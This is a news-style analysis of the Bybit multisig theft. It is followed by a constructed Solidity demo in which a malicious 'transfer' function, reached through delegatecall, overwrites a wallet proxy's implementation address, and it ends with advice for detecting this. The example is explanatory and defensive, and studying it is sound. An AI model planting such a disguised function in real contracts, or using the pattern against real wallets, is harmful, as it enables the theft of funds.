
Dilation Effect analysis: Bybit attack uses social engineering to bypass multi-signature security

Dilation Effect's analysis points out that, compared with earlier incidents of this kind, only one signer needed to be targeted to complete the Bybit attack, because the attacker relied on social engineering rather than on compromising every signer's key. Looking at the on-chain transaction, the attacker executed the transfer function of a malicious contract through delegatecall. That transfer code uses the SSTORE instruction to overwrite storage slot 0, which in the Bybit cold-wallet multi-signature proxy contract holds the implementation address, replacing it with an address controlled by the attacker. The attacker only needed to compromise the person or device that initiated the multi-signature transaction; the reviewers who approved it afterwards saw what looked like an ordinary token transfer and lowered their guard accordingly. A normal person who sees a transfer assumes it is a transfer; who would suspect that it is actually a change of the contract's implementation?
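To make the mechanism concrete, the following is an added, constructed illustration (not Bybit's, Safe's, or the attacker's code) of why a delegatecall to a harmless-looking transfer function can replace a wallet's implementation. The contract names (Proxy, WalletLogic, FakeTransfer, Demo) and the simplified execTransaction, which omits signature checking, are assumptions for the example; the one property it preserves is that slot 0 of the proxy holds the implementation address and that delegatecall executes the callee's code against the caller's storage.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Constructed example. Layout mirrors the analysis: the proxy keeps its
// implementation pointer in storage slot 0, wallet logic runs in the proxy's
// storage context via delegatecall, and a "transfer" function writes slot 0.

// Minimal proxy in the style of a Safe proxy: slot 0 = implementation.
contract Proxy {
    address internal singleton; // storage slot 0

    constructor(address _singleton) {
        singleton = _singleton;
    }

    // Explicit getter so the example can read slot 0 without trusting the
    // (possibly attacker-controlled) implementation.
    function implementation() external view returns (address) {
        return singleton;
    }

    // Every other call is forwarded to the implementation with delegatecall,
    // so the implementation's code runs against this proxy's storage.
    fallback() external payable {
        address s = singleton;
        assembly {
            calldatacopy(0, 0, calldatasize())
            let ok := delegatecall(gas(), s, 0, calldatasize(), 0, 0)
            returndatacopy(0, 0, returndatasize())
            if iszero(ok) { revert(0, returndatasize()) }
            return(0, returndatasize())
        }
    }
}

// Stand-in for the multisig logic living in the implementation. Because it
// runs via delegatecall, `singleton` here aliases the proxy's slot 0.
// Signature collection and verification are elided (assumption: the
// required signers have already approved this exact calldata).
contract WalletLogic {
    address internal singleton; // slot 0, layout must match Proxy

    function execTransaction(
        address to, uint256 value, bytes calldata data, uint8 operation
    ) external returns (bool ok) {
        // operation 1 = DELEGATECALL: runs `to`'s code with the wallet's storage.
        if (operation == 1) {
            (ok, ) = to.delegatecall(data);
        } else {
            (ok, ) = to.call{value: value}(data);
        }
    }
}

// The malicious contract: a function with an ERC-20 transfer signature whose
// body stores its first argument into slot 0. Harmless if called normally
// (it only writes its own storage); fatal when delegatecalled by the wallet.
contract FakeTransfer {
    function transfer(address to, uint256) external returns (bool) {
        assembly { sstore(0, to) }
        return true;
    }
}

// Runs the whole sequence in one transaction, e.g. from Remix.
// Returns the proxy's implementation before and after the "transfer".
contract Demo {
    function run(address attackerImpl) external returns (address before, address afterwards) {
        WalletLogic logic = new WalletLogic();
        Proxy proxy = new Proxy(address(logic));
        FakeTransfer fake = new FakeTransfer();

        before = proxy.implementation(); // == address(logic)

        // What a reviewer sees: a call to transfer(attackerImpl, 0).
        bytes memory data = abi.encodeWithSignature(
            "transfer(address,uint256)", attackerImpl, 0
        );
        // What actually happens: operation 1 delegatecalls FakeTransfer inside
        // the proxy's storage context, so sstore(0, to) rewrites slot 0.
        WalletLogic(address(proxy)).execTransaction(address(fake), 0, data, 1);

        afterwards = proxy.implementation(); // == attackerImpl
    }
}
```

The reviewer-facing signal is the operation field, not the function name: a transfer to a token contract is operation 0 (CALL), and a wallet that never needs delegatecall for routine payments can treat operation 1, or any target that is not a known token, as grounds to reject the transaction before signing.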
